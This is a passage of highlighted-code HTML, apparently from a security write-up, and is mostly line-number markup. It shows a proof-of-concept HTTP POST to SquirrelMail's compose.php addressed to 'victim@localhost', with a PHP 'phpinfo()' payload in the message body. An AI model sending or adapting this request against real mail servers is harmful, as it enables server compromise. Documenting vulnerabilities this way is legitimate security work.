&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;username&#8221;    hacker    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;smaction&#8221;      &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;mailbox&#8221;    INBOX  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;composesession&#8221;    4  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894  Content-Disposition: form-data; name=&#8221;querystring&#8221;    mailbox=None&amp;amp;startMessage=0  &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;1786870111972091653456139894&#8211;<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-8\">8<\/div>\n<div 
data-line=\"crayon-58ffcba740c03739908820-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" 
data-line=\"crayon-58ffcba740c03739908820-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-76\">76<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-77\">77<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-78\">78<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-79\">79<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-80\">80<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-81\">81<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-82\">82<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-83\">83<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-84\">84<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58ffcba740c03739908820-85\">85<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58ffcba740c03739908820-86\">86<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-1\"><span class=\"crayon-v\">POST<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">squirrelmail<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">compose<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">php 
<\/span><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-2\"><span class=\"crayon-v\">Host<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">trusty<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-3\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">squirrelmail_language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">deleted<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">SQMSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">udp0a3dbm2oba2710a6amh0kg0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">key<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">aT2bDg<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-cn\">3D<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">mailviewsplitterv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">226<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">prefviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">folderviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">identviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">266<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">composesplitterv<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">248<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addressviewsplitterd<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">226<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addressviewsplitter<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">286<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">roundcube_sessid<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">151ubr2mfl36odovf7vkk66v60<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">minimalmode<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-4\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">keep<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-e\">alive<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-5\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">multipart<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">boundary<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-6\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2275<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-8\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-9\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;smtoken&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-10\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-11\"><span class=\"crayon-v\">qseiZ0jvPW8f<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-12\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-13\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;startMessage&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-14\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-15\"><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-16\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-17\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;session&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-19\"><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-20\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-21\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;passed_id&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-23\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-24\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-25\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;send_to&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-26\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-27\"><span class=\"crayon-v\">victim<\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-v\">localhost<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-28\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-29\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;send_to_cc&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-32\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-34\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-35\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;send_to_bcc&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-36\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-37\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-38\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-39\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;subject&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-40\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-41\"><span class=\"crayon-e\">Squirrel <\/span><span class=\"crayon-v\">PoC<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-42\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-43\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;mailprio&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-45\"><span class=\"crayon-cn\">3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-46\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-47\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;body&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-48\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-49\"><span class=\"crayon-e\">Squirrel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Hack<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-50\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-51\"><span class=\"crayon-ta\">&lt;?php<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">phpinfo<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-ta\">?&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-52\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-cn\">1786870111972091653456139894<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-53\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">Disposition<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">-<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&quot;send&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-54\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58ffcba740c03739908820-55\"><span class=\"crayon-v\">Send<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58ffcba740c03739908820-56\"><span class=\"crayon-o\">--<\/span><span class=\"crayon-o\">--<\/span><span 